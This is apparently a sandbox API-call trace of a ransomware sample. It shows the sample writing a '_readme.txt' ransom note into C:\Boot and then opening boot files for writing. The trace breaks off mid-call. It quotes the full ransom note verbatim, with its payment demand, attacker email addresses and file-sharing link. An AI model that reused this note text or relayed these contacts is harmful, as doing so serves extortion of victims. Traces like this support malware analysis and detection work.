1 [0187.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.830] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0187.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.831] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.831] PathFindFileNameW (pszPath="") returned="" [0187.831] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.832] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.832] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.832] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.832] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0187.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.832] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0187.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0187.833] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0187.833] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0187.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0187.833] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0187.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0187.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.835] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0187.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.836] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.836] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x35246c20, ftLastAccessTime.dwHighDateTime=0x1d8a73e, ftLastWriteTime.dwLowDateTime=0x94d0f2f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0187.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.836] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0187.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.836] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x94ce9190, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0187.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.836] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0187.836] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.837] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0187.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.837] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0187.837] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.838] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0187.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.839] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0187.839] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.839] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0187.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.840] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0187.840] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.840] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0187.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83958 [0187.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0187.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.841] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0187.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0187.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0187.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0187.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.843] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0187.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0187.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0187.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0187.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bd8 | out: hHeap=0x620000) returned 1 [0187.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0187.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.845] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0187.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0187.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c00 | out: hHeap=0x620000) returned 1 [0187.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0187.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 